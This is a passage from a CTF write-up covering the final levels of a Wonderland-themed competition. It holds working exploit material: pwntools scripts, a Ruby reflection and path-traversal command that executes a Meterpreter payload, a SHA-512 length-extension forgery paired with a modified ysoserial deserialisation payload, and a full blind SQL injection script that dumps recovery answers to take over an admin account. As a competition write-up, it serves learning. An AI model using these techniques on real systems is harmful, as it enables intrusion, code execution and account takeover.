print(p.recvuntil(b']'))
p.sendline(b'move a-pause-in-the-trees')
print(p.recvuntil(b']'))
p.sendline(b'move confusing-knot')
print(p.recvuntil(b']'))
p.sendline(b'move green-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move a-fancy-pavillion')
print(p.recvuntil(b']'))
p.sendline(b'get fluffy-cake')
print(p.recvuntil(b']'))
p.sendline(b'move along-the-rolling-waves')
print(p.recvuntil(b']'))
p.sendline(b'move a-sandy-shore')
print(p.recvuntil(b']'))
p.sendline(b'move a-mystical-cove')
print(p.recvuntil(b']'))
p.sendline(b'get looking-glass')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move further-into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move nearing-a-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move clearing-of-flowers')
print(p.recvuntil(b']'))
p.sendline(b'get morning-glory')
print(p.recvuntil(b']'))
p.sendline(b'move under-a-giant-mushroom')
print(p.recvuntil(b']'))
p.sendline(b'get golden-hookah')
print(p.recvuntil(b']'))
p.sendline(b'move eternal-desolation')
print(p.recvuntil(b']'))
p.sendline(b'move cosmic-desert')
print(p.recvuntil(b']'))
p.sendline(b'move tear-in-the-rift')
print(p.recvuntil(b']'))
## read flag2.bin
## p.sendline(b'teleport ../../../../home/rabbit')
## print(p.recvuntil(b'[rabbit]'))
## p.sendline(b'read flag2.bin')
## flag2_bin = p.recvuntil(b']')
## with open('flag2.bin', 'wb') as file:
## file.write(flag2_bin)
## send payload
with open('payload.item', 'rb') as file:
p.sendline(b'blowsmoke a.item ' + urllib.parse.quote(file.read()).encode())
print(p.recvuntil(b']'))
## execute payload
p.sendline(b'teleport ../../../../opt/wonderland/logs')
print(p.recvuntil(b']'))
p.sendline(b'get tear-in-the-rift-a')
print(p.recvuntil(b']'))
p.interactive()
The exploit went off without a hitch and I got my shell.
TISC{dr4b_4s_a_f00l_as_al00f_a5_A_b4rd}
Part 3: Advice from a Caterpillar
PALINDROME's taunts are clear: they await us at the Tea Party hosted by the Mad Hatter and the March Hare. We need to gain access to it as soon as possible before it's over.
The flowers said that the French Mouse was invited. Perhaps she hid the invitation in her warren. It is said that her home is decorated with all sorts of oddly shaped mirrors but the tragic thing is that she's afraid of her own reflection.
This challenge description included the key word “reflection”. I immediately thought of Java reflection attacks, but the Java app a-mad-tea-party was executed by the hatter user rather than mouse. From my shell, I exfiltrated all the source code in /opt/wonderland and reviewed the pool-of-tears Rails application run by mouse.
The controller logic for the blowsmoke API at pool-of-tears/app/controllers/smoke_controller.rb had the following code.
def remember
  # Log down messages from our happy players!
  begin
    ctype = "File"
    if params.has_key? :ctype
      # Support for future appending type.
      ctype = params[:ctype]
    end
    cargs = []
    if params.has_key?(:cargs) && params[:cargs].kind_of?(Array)
      cargs = params[:cargs]
    end
    cop = "new"
    if params.has_key?(:cop)
      cop = params[:cop]
    end
    if params.has_key?(:uniqid) && params.has_key?(:content)
      # Leave the kind messages
      fn = Rails.application.config.message_dir + params[:uniqid]
      cargs.unshift(fn)
      c = ctype.constantize
      k = c.public_send(cop, *cargs)
      if k.kind_of?(File)
        k.write(params[:content])
        k.close()
      else
        # TODO: Implement more types when we need distributed logging.
        # PALINDROME: Won't cat lovers revolt? Act now!
        render :plain => "Type is not implemented yet."
        return
      end
    else
      render :plain => "ERROR"
      return
    end
  rescue => e
    render :plain => "ERROR: " + e.to_s
    return
  end
end
The comments and the use of ctype.constantize attracted my attention, and I wondered if Ruby reflection attacks existed. They did.
Based on the source code, the ctype parameter was resolved to a matching Ruby class with ctype.constantize. Thereafter, c.public_send executed any of that class's public methods based on the cop parameter. The method was executed with arguments from the cargs array parameter.
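In Python terms, the constantize + public_send pattern is roughly “resolve a class from a string, then call a named public method on it” – a loose analogy to illustrate the attack surface, not the Rails internals:

```python
import importlib

def public_send(ctype: str, cop: str, *cargs):
    # Resolve "module.ClassName" to a class, then invoke the named method on it,
    # mirroring how ctype.constantize + public_send(cop, *cargs) behaves in Rails
    mod, _, name = ctype.rpartition('.')
    c = getattr(importlib.import_module(mod), name)
    return getattr(c, cop)(*cargs)

# Equivalent to '-'.join(['a', 'b']) invoked purely via strings
assert public_send('builtins.str', 'join', '-', ['a', 'b']) == 'a-b'
```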
However, pool-of-tears featured an interesting twist: because it prepended the Rails.application.config.message_dir + params[:uniqid] string to the cargs array, I could not execute anything I wanted; the method needed to accept the concatenated file path as the first argument. For example, one publicly-known Ruby reflection payload used Object.public_send("send","eval","system 'uname'"), which required the first argument to send to be eval. Since eval was a private method for Object, I could not execute it directly with public_send.
I searched the Ruby documentation for a suitable class and public method that allowed me to execute code. Eventually, I found the Kernel class, which included an exec public method. The first argument determined the command to be executed. Since this could be a file path, I realised that I could exploit a path traversal by sending a uniqid parameter like ../../../../../tmp/meterpreter. This led to c.public_send('exec', '/opt/wonderland/logs/../../../../../tmp/meterpreter'), therefore executing my meterpreter payload.
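The prefix is neutralised because enough ../ components walk back out of the logs directory (assuming message_dir is the /opt/wonderland/logs/ prefix shown above); os.path.normpath shows the collapsed result:

```python
import os.path

# The server concatenates its message directory with the attacker's uniqid
fn = '/opt/wonderland/logs/' + '../../../../../tmp/meterpreter'
# Resolving the traversal components lands on the attacker-controlled binary
assert os.path.normpath(fn) == '/tmp/meterpreter'
```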
I uploaded the payload to /tmp/met64.elf, then triggered the API with curl 'http://localhost:4000/api/v1/smoke?ctype=Kernel&cop=exec&uniqid=../../../../tmp/met64.elf&content=test'. After a few tense seconds, I got my shell!
/home/mouse contained a binary flag3.bin, which I executed to retrieve the flag. The directory also included an-unbirthday-invitation.letter:
Dear French Mouse,
The March Hare and the Mad Hatter
request the pleasure of your company
for an tea party evening filled with
clocks, food, fiddles, fireworks & more
Last Month
25:60 p.m.
By the Stream, and Into the Woods
Also available by way of port 4714
Comfortable outdoor attire suggested
PS: Dormouse will be there!
PSPS: No palindromes will be tolerated! Nor are emordnilaps, and semordnilaps!
By the way, please quote the following before entering the party:
ed4a1a59-0869-48ad-8bc6-ac64b04b02b6
TISC{mu5t_53ll_4t_th3_t4l13sT_5UM}
Part 4: A Mad Tea Party
Great! We have all we need to attend the Tea Party!
To get an idea of what to expect, we've consulted with our informant (initials C.C) who advised:
“Attend the Mad Tea Party.
Come back with (what's in) the Hatter's head.
Sometimes the end of a tale might not be the end of the story.
Things that don't make logical sense can safely be ignored.
Do not eat that tiny Hello Kitty.”
This is nonsense to us, so you're on your own from here on out.
As described in the invitation letter, the challenge ran the final Java application a-mad-tea-party on localhost port 4714.
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
Based on the source code of the application at tea-party/src/main/java/com/mad/hatter/App.java, I decided that the most likely exploit vector was the “Eat Cake” option, which would deserialise each fireworks byte array into a Firework object before executing firework.fire():
case 9:
    System.out.println("You eat the cake and you feel good!");
    for (Cake.Decoration deco : cakep.getDecorationsList()) {
        if (deco == Cake.Decoration.TINY_HELLO_KITTY) {
            running = false;
            System.out.println("A tiny Hello Kitty figurine gets lodged in your " +
                "throat. You get very angry at this and storm off.");
            break;
        }
    }
    if (cakep.getFireworksCount() == 0) {
        System.out.println("Nothing else interesting happens.");
    } else {
        for (ByteString firework_bs : cakep.getFireworksList()) {
            byte[] firework_data = firework_bs.toByteArray();
            Firework firework = (Firework) conf.asObject(firework_data); // deserialisation
            firework.fire();
        }
    }
    break;
I believed this was the exploit vector because Java deserialisation was an infamous code execution method. However, I could not add a deserialisation payload using “Add a Firework” because it only allowed me to select from a pre-set list of fireworks.
Which firework do you wish to add?
1. Firecracker.
2. Roman Candle.
3. Firefly.
4. Fountain.
Firework: 1
Firework added!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"
These fireworks had unexciting payloads, as seen in Firefly.java:
package com.mad.hatter;

public class Firefly extends Firework {
    static final long serialVersionUID = 45L;

    public void fire() {
        System.out.println("Firefly! Firefly! Firefly! Firefly! Fire Fire Firefly!");
    }
}
Meanwhile, the “Cake to Go” option exported my current cake in the format {"cake":"<HEX(BASE64(PROTOBUF-SERIALISED CAKE DATA))>","digest":"<ENCRYPTED HASH>"}.
Choice: 7
Here's your cake to go:
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
I could also import cakes with the “Go to Cake” option.
Choice: 8
Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"
This looked like a good way to smuggle in my own Firework data. However, the source code revealed that the application properly validated the digest value using a SHA-512 hash.
case 8:
    System.out.print("Please enter your saved cake: ");
    scanner.nextLine();
    String saved = scanner.nextLine().trim();
    try {
        HashMap<String, String> hash_map = new HashMap<String, String>();
        hash_map = (new Gson()).fromJson(saved, hash_map.getClass());
        byte[] challenge_digest = Hex.decodeHex(hash_map.get("digest"));
        byte[] challenge_cake_b64 = Hex.decodeHex(hash_map.get("cake"));
        byte[] challenge_cake_data = Base64.decodeBase64(challenge_cake_b64);
        MessageDigest md = MessageDigest.getInstance("SHA-512");
        byte[] combined = new byte[secret.length + challenge_cake_b64.length];
        System.arraycopy(secret, 0, combined, 0, secret.length);
        System.arraycopy(challenge_cake_b64, 0, combined, secret.length,
            challenge_cake_b64.length);
        byte[] message_digest = md.digest(combined);
        if (Arrays.equals(message_digest, challenge_digest)) {
            Cake new_cakep = Cake.parseFrom(challenge_cake_data);
            cakep.clear();
            cakep.mergeFrom(new_cakep);
            System.out.println("Cake successfully gotten!");
        }
        else {
            System.out.println("Your saved cake went really bad...");
        }
In order to forge my own arbitrary cake data, I needed to pass this check. I found a great Dragon CTF 2019 writeup that covered a similar challenge involving protobuf-serialised data and an MD5 hash verification. However, while MD5 collisions are easy to create, this application used SHA-512, which is computationally infeasible to brute-force or collide – not that it stopped me from trying. After many fruitless attempts at cracking the hash, I pondered the challenge description again. “Things that don't make logical sense can safely be ignored” clearly warned me against taking on the impossible like cracking SHA-512. But what did “Sometimes the end of a tale might not be the end of the story” mean?
After several more hours of aimless wandering, I found a StackExchange discussion about breaking SHA-512. One of the answers struck me:
Are there any successful attacks out there?
No, except length extension attacks, which are possible on any unaltered or extended Merkle-Damgard hash construction (SHA-1, MD5 and many others, but not SHA-3 / Keccak). If that's a problem depends on how the hash is used. In general, cryptographic hashes are not considered broken just because they suffer from length extension attacks.
Length extension attacks... “Sometimes the end of a tale might not be the end of the story”... I facepalmed for probably the hundredth time in the competition.
The application prepended a salt (the secret
variable) to the base64-encoded cake data, then generated a SHA-512 hash of the concatenated string. Furthermore, the source code revealed the length of secret
:
public static byte[] get_secret() throws IOException {
    // Read the secret from /home/hatter/secret.
    byte[] data = FileUtils.readFileToByteArray(new File("/home/hatter/secret"));
    if (data.length != 32) {
        System.out.println("Secret does not match the right length!");
    }
    return data;
}
This was a classic setup for a hash extension attack. I won't re-hash the explanation – there is a hash_extender
repository on GitHub that breaks down this attack. Even better, it includes a tool to perform the hash extension attack on several hash algorithms, including SHA-512. Thanks, Ron Bowes!
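For the curious, the glue padding that hash_extender inserts between the original data and the appended bytes can be reconstructed by hand from the SHA-512 specification (FIPS 180-4): a 0x80 byte, enough zero bytes to fill out the 128-byte block, then the total bit length as a 128-bit big-endian integer. A minimal sketch, assuming only the secret's length (32, as revealed by get_secret()) and the CgAQACIA cake data exported earlier:

```python
# Sketch: compute the SHA-512 "glue" padding that hash_extender inserts.
# Only the *length* of the secret is assumed, never its value.
def sha512_glue_padding(total_message_len: int) -> bytes:
    """Padding for a message of total_message_len bytes (secret + data),
    per FIPS 180-4: 0x80, zero bytes, then the 128-bit big-endian bit length."""
    bit_len = total_message_len * 8
    # Pad so that message + padding is a multiple of the 128-byte block size,
    # with the final 16 bytes reserved for the bit-length field: 128 - 1 - 16 = 111.
    zero_count = (111 - total_message_len) % 128
    return b"\x80" + b"\x00" * zero_count + bit_len.to_bytes(16, "big")

SECRET_LEN = 32                    # revealed by get_secret() in the source
original = b"CgAQACIA"             # base64-encoded cake data from "Cake to Go"
glue = sha512_glue_padding(SECRET_LEN + len(original))

# The message the server will actually hash after prepending the secret;
# "EAE=" is base64 for the protobuf bytes 10 01, i.e. candles = 1.
forged = original + glue + b"EAE="
assert (SECRET_LEN + len(original) + len(glue)) % 128 == 0
```

hash_extender then resumes the SHA-512 compression function from the original digest to produce a valid digest for the forged message, without ever knowing the secret.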
I generated a test payload to append candles = 1
in Protobuf format to the data I had previously exported using the Cake to Go
function.
> hash_extender/hash_extender -l 32 -d CgAQACIA -s <ORIGINAL HASH> -f sha512 -a EAE=
> <FORGED MESSAGE DIGEST>
I tested the modified JSON by importing it into the application using the Go to Cake
function.
Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!
[Cake Designer Interface v4.2.1]
1. Set Name.
2. Set Candles.
3. Set Caption.
4. Set Flavour.
5. Add Firework.
6. Add Decoration.
7. Cake to Go.
8. Go to Cake.
9. Eat Cake.
0. Leave the Party.
[Your cake so far:]
name: ""
candles: 1
flavour: ""
Great success!
After confirming that the hash length extension attack allowed me to forge my own cake data, I moved on to generate a deserialisation payload. ysoserial
appeared to be the obvious tool of choice, but according to the pom.xml
manifest, the application only imported commons-beanutils
whereas the ysoserial
CommonsBeanutils1
payload required commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
. Fortunately, after checking some of the pull requests for the repository, I discovered one that removed the additional dependencies. Pumped with excitement, I cloned the repo, modified the code based on the pull request, generated my payload, and sent my hash-extended data. It didn't work.
Checking the error messages, I realised to my horror that the application did not use the standard ObjectInputStream
deserialisation. Instead, it was using the FST library to serialise and deserialise payloads and thus required a completely different serialisation format. To get the ysoserial
payload to work, I modified the tool's source code in GeneratePayload.java
to serialise payloads with FST instead of the standard ObjectOutputStream
.
public class GeneratePayload {
    private static final int INTERNAL_ERROR_CODE = 70;
    private static final int USAGE_CODE = 64;
    static FSTConfiguration conf = FSTConfiguration.createDefaultConfiguration();
    ...
    try {
        final ObjectPayload payload = payloadClass.newInstance();
        final Object object = payload.getObject(command);
        PrintStream out = System.out;
        byte[] payload_data = conf.asByteArray(object);
        FileOutputStream outputStream = new FileOutputStream("payload.hex");
        outputStream.write(payload_data);
I re-compiled ysoserial
, generated my payload, and sent it off. However, it crashed again when entering my JSON payload. What went wrong? Looking at the error messages, I realised that the program cut off my input at 4096 bytes. This was because the code used scanner.nextLine()
to accept input, which was limited to 4096 bytes at a time. At my wits' end, I made a last-ditch attempt by port forwarding the application via my Meterpreter shell, then used pwntools
to send the input directly instead of copying and pasting my payload.
from pwn import *
## p = process(['java', '-jar','opt/wonderland/a-mad-tea-party/tea-party/target/tea-party-1.0-SNAPSHOT.jar'])
p = remote('<IP ADDRESS>', 4445)
print(p.recvuntil("Invitation Code:"))
p.sendline(b'<INVITATION CODE>')
print(p.recvuntil("Choice:"))
p.sendline(b'8')
p.sendline(b'{"cake":"<CAKE DATA>","digest":"<DIGEST>"}')
p.interactive()
To my huge relief, it worked and I got my Meterpreter shell! I was finally at the end of this long rabbit hole. Take a bow!
TISC{W3_y4wN_A_Mor3_r0m4N_w4y}
Level 10: Malware for UwU
Domains: Web, Binary Exploitation (Windows Shellcoding), Reverse Engineering, Cryptography
We've found a PALINDROME webserver, suspected to be the C2 Server of a newly discovered malware! Get the killswitch from the bot masters before the malware goes live!
May the Force (not brute force) be with UwU!
The final countdown! I headed to the website which featured a simple login page.
I could register as a user without any problems.
After registering, I logged in to a simple dashboard.
The beautiful bird image was in fact a huge series of styled <span>
elements.
<span class="ascii" style="display:inline-block;white-space:pre;letter-spacing:0;line-height:1;font-family:'BitstreamVeraSansMono','CourierNew',Courier,monospace;font-size:16px;border-width:1px;border-style:solid;border-color:lightgray;">
<span style="background-color:#d7875f;color: #d7af87;">|</span>
<span style="background-color:#d7875f;color: #af5f00;">|</span>
<span style="background-color:#d7875f;color: #af5f00;">|</span><
...
</span>
Since the original domain description for this level omitted Web, I suspected this was a Cryptography challenge and got tangled up trying to analyse the hexadecimal colour values. After several fruitless hours, I clarified this with the organisers and they corrected the domain list to include Web. This prompted me to look for Web attack vectors instead. The “Contact your PALINDROME admin for further instructions!” text suggested that an admin user account existed so I began looking for a possible SQL injection. At first, I thought that the login form was vulnerable because sending %27+OR+%27
in the password
field caused the response to drop. However, I eventually decided that this was a deliberate red herring because %27+OR++%27
, which should have been interpreted the same as %27+OR+%27
in SQL syntax, did not drop the response.
Moving on, I noticed something interesting when I added a single quote to all of the form values while registering a new user.
POST /new_user.php HTTP/1.1
Host: <IP ADDRESS>:18080
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP ADDRESS>:18080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=johndoe'&password=johndoe'&recovery_q1=Q1'&recovery_a1=johndoe'&recovery_q2=Q2'&recovery_a2=johndoe'&recovery_q3=Q4'&recovery_a3=johndoe'
When I tried to reset the user's password with the recovery questions, the self-service password reset correctly fetched the user but failed to fetch any of the recovery questions.
This suggested that an SQL injection had occurred in the SQL statement fetching the user's recovery questions. I guessed that the statement partly resembled select question_text from recovery_questions where recovery_id = '<UNSANITISED VALUE OF recovery_q1 FROM REGISTRATION>'
. As such, I could exploit a two-step SQL injection by signing up with the SQL payload in the recovery_q1
parameter, then retrieving the result at the user's password reset page. Unfortunately, after further testing I discovered that the application ran a filter on UNION
in my payload that prevented me from directly leaking additional strings; all UNION
payloads failed even though typical ' AND '1'='1
injections worked. Furthermore, the SELECT INTO OUTFILE
remote code execution vector also failed. Instead, I relied on boolean-based output. If my injected statements evaluated to true, the password reset page would correctly fetch the user's recovery question text. If they evaluated to false, the recovery question text would be missing.
This required massive numbers of registration and password reset requests, forcing me to automate my SQL injection. I used GUIDs for the usernames to avoid collisions in registration. My first order of business was to enumerate the table names. I leaked the number of tables and then retrieved the names of the last few tables to ensure that they were user-created rather than system tables.
import requests
import uuid
import string
NEW_USER_URL = 'http://<IP ADDRESS>:18080/new_user.php'
FORGOT_PASSWORD_URL = 'http://<IP ADDRESS>:18080/forgot_password.php'
CANDIDATE_LETTERS = string.printable
## Get number of tables
## 63
## appdb
def leak_table_count():
    count = 0
    found = False
    while not found:
        username = uuid.uuid4().hex
        payload = {
            'username': username,
            'password': username,
            'recovery_q1': 'Q1',
            'recovery_a1': username,
            'recovery_q2': 'Q2',
            'recovery_a2': username,
            'recovery_q3': 'Q3',
            'recovery_a3': username
        }
        payload['recovery_q1'] = "Q1' AND ((SELECT COUNT(*) from information_schema.tables)='{}')#".format(count)
        r = requests.post(NEW_USER_URL, data=payload)
        # print(r.text)
        if 'New UwUser registered!' in r.text:
            print("CREATED USER WITH PAYLOAD {}".format(payload))
        else:
            print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
            exit(-1)
        r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
        if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
            print("CANDIDATE SUCCESS")
            found = True
        else:
            print("CANDIDATE FAILED")
            # exit(-1)
        count += 1
    print("Number of tables: {}".format(count))
## Get table name (start from last few tables to get user tables)
## innodb_sys_tablestats, qnlist, userlist
def leak_table_name(table_number):
    table_name = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username,
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT table_name from information_schema.tables LIMIT {}, 1), 1, {})) = BINARY '{}'#".format(table_number, len(table_name) + 1, table_name + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                table_name += candidate_letter
                print(table_name)
                break
            else:
                print("CANDIDATE FAILED")
    print(table_name)
Now that I had the table names qnlist
and userlist
, I retrieved their column names.
## Get concatted column names for the table
## username,pwdhash,usertype,email,recover_q1,recover_a1,recover_q2,recover_a2,recover_q3,recover_a3
## q_tag, q_body
def leak_column_names(table_name):
    column_names = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username,
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = '{}'), 1, {})) = BINARY '{}'#".format(table_name, len(column_names) + 1, column_names + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                column_names += candidate_letter
                print(column_names)
                break
            else:
                print("CANDIDATE FAILED")
    print(column_names)
usertype
suggested that there indeed existed an admin user in the database. I began retrieving all of the users' data.
## Leaks user data (only leak essential columns to takeover)
## TeoYiBoon,3043b513222221993f7ade356f521566,0,[email protected],Q2,Dirty Gorilla,Q6,Mark Zuckerberg,Q7,Fox
## oscarthegrouch,3043b513244444993f7ade356f521566,0,[email protected],Q3,cat recycle bin,Q4,Operation Garbage Can,Q5,5267385
## barney,3043b513244555993f7ade356f521566,0,[email protected],Q1,Major Planet,Q4,Operation Garbage Can,Q7,Purple dinosaur
## rollrick,3043b513244556993f7ade356f521566,0,[email protected],Q2,Rick n Roll,Q3,Operation RICKROLL,Q6,PICKLE RICKKKK
## noobuser,3043b513111111993f7ade356f521566,0,[email protected],Q1,Boba Abob,Q2,Eternal Fuchsia,Q3,Troll your buddy
def leak_user_data(user_number):
    user_data = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username,
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            # CONCAT(username,',',usertype,',',email,',',recover_a1,',',recover_a2,',',recover_a3)
            # payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(HEX(recover_a1),',',HEX(recover_a2),',',HEX(recover_a3)) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter) # for my boy c1-admin
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(recover_a1,',',recover_q2,',',recover_a2,',',recover_q3,',',recover_a3) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            # if 'New UwUser registered!' in r.text:
            #     print("CREATED USER WITH PAYLOAD {}".format(payload))
            if 'New UwUser registered!' not in r.text:
                # print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                # print("CANDIDATE SUCCESS: {}".format(ord(candidate_letter)))
                found = True
                user_data += candidate_letter
                print(user_data)
                break
            # else:
            #     print("CANDIDATE FAILED")
            #     break
    print(user_data)
I needed to HEX
the fetched user's data because when my script reached the juicy laojiao-c2admin
user, it exited early on recovery answer 2, returning X
. I suspected that there was some kind of special character in the way. Indeed, the user's answer to What is the name of an up and coming evil genius that inspires you?
turned out to be X Æ A-12
. Along the way, I modified my script to leak a few additional values and confirmed that the current examdbuser@localhost
user lacked FILE
permissions. Additionally, I found out that the application sanitised union
to onion
and sleep
to sheep
. Eventually, I finished extracting the admin user's data: laojiao-c2admin,1,[null],6-235-35-35,X Æ A-12,Nat Uwu Tan
.
I successfully reset laojiao-c2admin
's password using the recovery answers and logged in. This time, I encountered the same dashboard with an important change at the bottom – instead of “Contact your PALINDROME admin for further instructions!”, there was a link to download a binary named UwU.exe
!
I downloaded UwU.exe
and attempted to execute it, but it exited immediately. I opened it in PE-bear and noticed that the .text
and .data
sections had been replaced by .MPRESS1
and .MPRESS2
. I Googled this and found that it indicated the executable had been packed with the MPRESS packer. There were several tutorials online describing how to manually unpack such executables, but I wanted to try some automated options first. Here's a list of the ones I used.
- Avast RetDec: Failed to recognise the MPRESS packing.
- unipacker: Managed to unpack but set the original entry point too early so the executable crashed.
- QuickUnpack: The OG unpacker. It was difficult to find a working copy and I had to download it in a hermetically sealed VM and take a shower afterwards. Unsurprisingly, this was the only unpacker that worked perfectly.
With the unpacked UwU.exe
, I could now easily decompile and debug it.
I executed the binary and was blasted by the song of my people.
Right away, I tried the “Display Killswitch” option and enjoyed another sweet, sweet lullaby but no killswitch flag.
Next, I ran the “Register Bird” option, which prompted me for an IP address and port. I set this to the website's IP address and port and successfully registered. Additionally, this triggered an HTTP request that I captured using Wireshark.
POST /register.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 60
Host: <IP ADDRESS>:18080
action=register&a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:33:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 48
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma
Next, I selected “Send Message” which accepted a target UwUID and message before sending another HTTP request.
POST /send.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 28
Host: <IP ADDRESS>:18080
action=send&a=ABCDEF&b=HELLO
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:35:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Finally, I tested “Receive Messages” which continuously sent the following HTTP request every few seconds.
POST /receive.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 56
Host: <IP ADDRESS>:18080
UwUID=oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma
I also popped the executable into VirusTotal and ANY.RUN to observe more static or dynamic behaviour but did not glean anything new. I moved on to reverse engineering the unpacked executable, starting with the register function.
The binary featured many dead ends. For example, it included unreachable code like this.
switch ( rand() % 5 )                           // actually, none of these will happen right? can safely ignore
{
    case 44:
        display_logo();
        break;
    case 88:
        display_killswitch();
        break;
    case 132:
        sub_557571D0(v39, e_flat);
        sub_55752C60(v39[0], (int)v39[1], (int)v39[2], (int)v39[3], (int)v39[4], v40);
        break;
    case 176:
        receive_messages(v41);
        break;
    case 220:
        register_bird(v41);
        break;
    case 264:
        send_message(v41);
        break;
    default:
        break;
}
Additionally, the binary used very few plaintext strings, preferring to decrypt them dynamically. For example, the following function returned the value “Not registered”:
void __thiscall sub_557574E0(_BYTE *this)
{
    unsigned int v1; // ebx
    unsigned int v2; // esi

    if ( this[15] )
    {
        v1 = 0;
        v2 = 0;
        do
        {
            this[v2] ^= 0x5AA5D2B4D39B2B69ui64 >> (8 * (v2 & 7));
            v1 = (__PAIR64__(v1, v2++) + 1) >> 32;
        }
        while ( __PAIR64__(v1, v2) < 0xF );
        this[15] = 0;
    }
}
I decrypted these dynamically by setting breakpoints at the ret
instruction and dumping EAX
.
